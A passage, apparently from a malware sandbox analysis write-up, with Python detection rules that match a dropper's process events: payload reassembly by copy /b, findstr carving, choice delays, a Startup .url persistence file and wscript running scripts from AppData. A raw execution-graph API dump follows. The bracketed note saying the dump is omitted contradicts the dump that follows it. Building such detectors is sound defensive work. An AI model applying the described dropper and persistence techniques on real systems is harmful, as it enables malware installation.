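    ProcessEvent(14, r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcessEvent(16, r"C:\Windows\System32\wscript.exe",
                 r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js"'),
    ProcessEvent(17, r"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr",
                 r'"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" '
                 r'"C:\Users\user\AppData\Local\Immersive Creations Co\D"'),
]

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".bat", ".cmd", ".ps1"}
DISGUISED_EXTS = {".pif", ".scr", ".com"}  # PE/DOS executables hiding behind a non-.exe extension
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Heuristic (assumption): directories an unprivileged user can write to.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Users\\Public)\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)


def _image_name(ev):
    return ntpath.basename(ev.image).lower()


def _ext(path):
    return ntpath.splitext(path)[1].lower()


def url_target(cmdline):
    # Path echoed after URL= when a .url file is built from the shell (quoted or bare form).
    m = re.search(r'URL="([^"]+)"', cmdline, re.I) or re.search(r"URL=(\S+)", cmdline, re.I)
    return m.group(1) if m else None


def rule_copy_b_concat(ev):
    # cmd.exe reassembling a payload from fragments: copy /b a + b + c ... out
    m = re.search(r"copy\s+/b\s+(.+)", ev.cmdline, re.I)
    return _image_name(ev) == "cmd.exe" and m is not None and len(m.group(1).split("+")) >= 3


def rule_findstr_v_filter(ev):
    # findstr /V "<marker>" <file>: removes a marker line to carve a payload out of a file.
    return _image_name(ev) == "findstr.exe" and re.search(r'/V\s+"[^"]+"\s+\S+', ev.cmdline, re.I) is not None


def rule_choice_as_sleep(ev):
    # choice /d <default> /t <seconds> used as a timer when no user is at the console.
    return _image_name(ev) == "choice.exe" and re.search(r"/d\s+\S+\s+/t\s+\d+", ev.cmdline, re.I) is not None


def rule_startup_url_dropper(ev):
    # A shell writing an [InternetShortcut] into Startup that points at a script or executable.
    if "[InternetShortcut]" not in ev.cmdline or not STARTUP_DIR.search(ev.cmdline):
        return False
    target = url_target(ev.cmdline)
    return target is not None and _ext(target) in SCRIPT_EXTS | DISGUISED_EXTS | {".exe"}


def rule_script_host_from_userprofile(ev):
    # wscript/cscript executing a script that lives in a user-writable directory.
    args = ev.cmdline.lower()
    return (_image_name(ev) in SCRIPT_HOSTS and USER_WRITABLE.search(args) is not None
            and any(e in args for e in SCRIPT_EXTS))


def rule_disguised_ext_from_userprofile(ev):
    # A .pif/.scr/.com image started from a user-writable directory.
    return _ext(ev.image) in DISGUISED_EXTS and USER_WRITABLE.search(ev.image) is not None


RULES = {
    "copy_b_concat": rule_copy_b_concat,
    "findstr_v_filter": rule_findstr_v_filter,
    "choice_as_sleep": rule_choice_as_sleep,
    "startup_url_dropper": rule_startup_url_dropper,
    "script_host_from_userprofile": rule_script_host_from_userprofile,
    "disguised_ext_from_userprofile": rule_disguised_ext_from_userprofile,
}


def scan(events):
    # (target_id, rule_name) for every rule that fires on every event.
    return [(ev.target_id, name) for ev in events for name, rule in RULES.items() if rule(ev)]


def link_persistence(events):
    # Tie the Startup .url dropper to a later script-host launch of the file it points at.
    for ev in events:
        if not rule_startup_url_dropper(ev):
            continue
        target = url_target(ev.cmdline)
        for later in events:
            if (later.target_id > ev.target_id and _image_name(later) in SCRIPT_HOSTS
                    and target.lower() in later.cmdline.lower()):
                return target
    return None


if __name__ == "__main__":
    for tid, rule in scan(EVENTS):
        print(f"Target {tid}: {rule}")
    print("persistence chain:", link_persistence(EVENTS))
```

Each rule on its own is noisy in a real estate (copy /b and choice /t have legitimate uses), so the value is in the correlation: link_persistence only reports when the file written into Startup is later handed to a script host, which is the sequence the report's "Drops script at startup location" and "WScript or CScript Dropper" signatures capture.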


                                                                            Execution Graph

                                                                            Execution Coverage:17.7%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:20.7%
                                                                            Total number of Nodes:1526
                                                                            Total number of Limit Nodes:34
[Execution graph node dump omitted: the original report renders this 1526-node call graph interactively, and the flattened node/edge list is not readable as text. Recoverable from it: the entry function at 0x403883 calls SetErrorMode, OleInitialize, GetModuleHandleA, GetCommandLineW, GetModuleHandleW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, DeleteFileW, GetTickCount and GetModuleFileNameW. The remaining nodes group into file I/O (CreateFileW, ReadFile, WriteFile, SetFilePointer, GetFileAttributesW, FindNextFileW, FindClose, SHFileOperationW), registry access (RegOpenKeyExW, RegCreateKeyExW, RegQueryValueExW, RegSetValueExW, RegEnumKeyW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey), dynamic API resolution and process inspection (LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary, GetVersionExW, OpenProcess, CloseHandle, CharUpperW, lstrcmpW), clipboard writes (OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, CloseClipboard), version-info queries (GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW), window messaging (FindWindowExW, SendMessageTimeoutW, SendMessageW, IsWindow, SetWindowLongW), COM (CoCreateInstance) and dialog code (CreateDialogParamW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, MessageBoxIndirectW, CreateFontIndirectW, BeginPaint, CreateThread). The dump is cut off at the end of the page.]
4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 
3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 
3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 
406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 
3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 
3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 
3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 
3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 
CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 
40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 
405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 